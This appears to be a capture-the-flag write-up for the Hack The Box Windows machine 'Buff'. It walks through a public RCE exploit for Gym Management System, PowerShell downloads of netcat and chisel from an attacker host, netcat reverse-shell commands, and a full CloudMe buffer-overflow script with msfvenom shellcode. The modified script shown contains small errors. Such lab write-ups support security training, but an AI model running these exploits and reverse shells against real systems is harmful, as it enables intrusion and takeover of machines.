Hack The Box — Buff Writeup

Buff is a Windows box with easy difficulty that features an open source web application, which can be exploited using a publicly available exploit. Internal enumeration discovers a program service that is bound to the loopback interface. The program is found to be vulnerable to a buffer overflow attack, and there is also a publicly available exploit to exploit it to gain access as Administrator. Because it is bound to the loopback interface, hence a setup for port forwarding is required before sending the exploit.

Reconnaissance

Nmap

An initial scan with nmap only discovers one port open on 8080 running an Apache web server.

mkdir nmap; nmap -sC -sV -oN nmap/initial-buff -v 10.10.10.198

Enumeration

TCP 8080 — Website

Visiting port 8080 displays a website for a Gym, on the title it is called “mrb3n’s Bro Hut”.

Clicking on the contact page discovers the name of the software behind this web application, “Gym Management System 1.0”

Contact Menu

:: Searchsploit

I can feed the software name to searchsploit. It shows several exploits, and one that stands out is the remote code execution.

searchsploit Gym Management System 1.0

Foothold

Gym Management System 1.0 RCE

I can mirror/make a copy of the “Gym Management System 1.0 - Unauthenticated Remote Code Execution” exploit code to the current working directory using searchsploit -m 48506.

I’ll rename 48506.py to exploit.py, and run it afterwards.

→ root@kali «exploit» «10.10.14.18»
$ python exploit.py http://10.10.10.198:8080/

With current pseudo shell access, I can’t change my directory but I can still grab the user flag.

C:\xampp\htdocs\gym\upload> type \users\shaun\desktop\user.txt

Upgrade to Interactive Shell

To make the shell a bit more comfy, I uploaded a netcat using powershell to Buff, and then I’ll create another reverse shell session.

First, I’ll host the 64 bit netcat, nc64.exe.

On Buff, I’ll grab the hosted nc64.exe using PowerShell.

C:\xampp\htdocs\gym\upload> powershell.exe "invoke-webrequest -uri http://10.10.14.18/nc64.exe -outfile nc.exe"

Now I’ll setup a listener on my Kali, and send a reverse shell from Buff using the downloaded nc.exe.

C:\xampp\htdocs\gym\upload>.\nc.exe -e cmd.exe 10.10.14.18 9001

I have a “proper” shell now.

Privileges Escalation

Internal Enumeration

After enumerating the Users folder, I noticed a slightly different output when typing the dir command in shaun home directory.

In the Download folder, there is an executable file called CloudMe_1112.exe where 1112 is likely a version number.

Checking on currently running services with netstat discovers.

netstat -aonp tcp

I can search the program name of that PID using the tasklist command.

C:\xampp\htdocs\gym\upload> tasklist /FI “PID eq 7352" /v /FO list

So PID 7352 on port 8888 is running CloudMe.exe.

Because the user name field is showing as N/A, one possible thing is that I don’t have enough privilege to dig for more information about the process because it might be running with a higher privilege (either administrator or a local system).

:: Searchsploit

A quick search about “CloudMe” on searchsploit pops several buffer overflow exploits.

searchsploit CloudMe

CloudMe Buffer Overflow (48389)

The CloudMe program is currently listening on localhost (bound), so to interact with it, I’ll have to setup a tunnel/port forwarding. For this, I’ll use chisel (https://github.com/jpillora/chisel/releases).

Example usage of chisel are explained better in this blog: https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel

First, I’ll transfer the Windows version of chisel to Buff via PowerShell.

C:\Users\shaun\Download> powershell.exe "invoke-webrequest -uri http://10.10.14.18/chisel.exe -outfile cs.exe"

Second, I’ll setup a chisel server on my Kali.

chisel server -p 9002

On Buff, I’ll connect as client to my chisel server on Kali.

C:\Users\shaun\Download> .\cs.exe client 10.10.14.18:9002 R:8888:127.0.0.1:8888

This, will forward the traffics that sent from my Kali Linux on port 8888 to Buff’s localhost on port 8888.

Kali localhost:8888<->Kali 10.10.14.18:9002<->Buff localhost:8888

I’ll use this exploit PoC (I’ve renamed it to bofexploit.py) but I’ll have to modify the payload with my own.

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload    = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload   += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload   += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload   += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload   += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload   += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload   += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload   += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload   += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload   += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload   += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload   += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload   += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload   += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload   += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload   += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload   += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,8888))
        s.send(buf)
except Exception as e:
        print(sys.exc_value)

To generate new payload, I’ll follow the instruction on the PoC code which is using msfvenom. But, instead of running calc.exe, I’ll change it to execute the netcat I’ve uploaded before (during upgrading the shaun shell)

msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.18 9005' -b '\x00\x0A\x0D' -f python -v payload

After removed the comments and changed the payload, the bofexploit.py now look like this:

import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
payload += b"\xbe\xd0\xe7\xa9\x73\xd9\xc7\xd9\x74\x24\xf4\x5f"
payload += b"\x31\xc9\xb1\x3e\x31\x77\x12\x03\x77\x12\x83\x17"
payload += b"\xe3\x4b\x86\x6b\x04\x09\x69\x93\xd5\x6e\xe3\x76"
payload += b"\xe4\xae\x97\xf3\x57\x1f\xd3\x51\x54\xd4\xb1\x41"
payload += b"\xef\x98\x1d\x66\x58\x16\x78\x49\x59\x0b\xb8\xc8"
payload += b"\xd9\x56\xed\x2a\xe3\x98\xe0\x2b\x24\xc4\x09\x79"
payload += b"\xfd\x82\xbc\x6d\x8a\xdf\x7c\x06\xc0\xce\x04\xfb"
payload += b"\x91\xf1\x25\xaa\xaa\xab\xe5\x4d\x7e\xc0\xaf\x55"
payload += b"\x63\xed\x66\xee\x57\x99\x78\x26\xa6\x62\xd6\x07"
payload += b"\x06\x91\x26\x40\xa1\x4a\x5d\xb8\xd1\xf7\x66\x7f"
payload += b"\xab\x23\xe2\x9b\x0b\xa7\x54\x47\xad\x64\x02\x0c"
payload += b"\xa1\xc1\x40\x4a\xa6\xd4\x85\xe1\xd2\x5d\x28\x25"
payload += b"\x53\x25\x0f\xe1\x3f\xfd\x2e\xb0\xe5\x50\x4e\xa2"
payload += b"\x45\x0c\xea\xa9\x68\x59\x87\xf0\xe6\x9c\x15\x8f"
payload += b"\x45\x9e\x25\x8f\xf9\xf7\x14\x04\x96\x80\xa8\xcf"
payload += b"\xd2\x7f\xe3\x4d\x72\xe8\xaa\x04\xc6\x75\x4d\xf3"
payload += b"\x05\x80\xce\xf1\xf5\x77\xce\x70\xf3\x3c\x48\x69"
payload += b"\x89\x2d\x3d\x8d\x3e\x4d\x14\xce\xfa\xed\xe2\xa3"
payload += b"\x9f\x7f\x7e\x1f\x13\xe8\xe1\xea\xbd\xb4\x85\x7b"
payload += b"\x35\x2b\x2a\xec\xd8\xd7\xc1\xae\x74\x7b\x08\x2b"
payload += b"\xf1\x1e\x74\x9e\x64\xc1\x17\x8d\x02\x2f\xbd\x35"
payload += b"\xae\x0f\x0c\xf5\x1e\x61\x5e\xdb\x6f\xb5\xb0\x16"
payload += b"\xa4\x95\xf5\x68\xf4\xe0\x05"
overrun = b"C" * (1500 — len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((target,8888))
 s.send(buf)
except Exception as e:
 print(sys.exc_value)

The exploit is ready, and now I’ll setup a listener on the same port with the one I’ve assigned to the payload and run the exploit afterwards.

→ root@kali «buff» «10.10.14.18»
$ python2 bofexploit.py

On my listener:

Now I can grab the root flag or dump the hashes.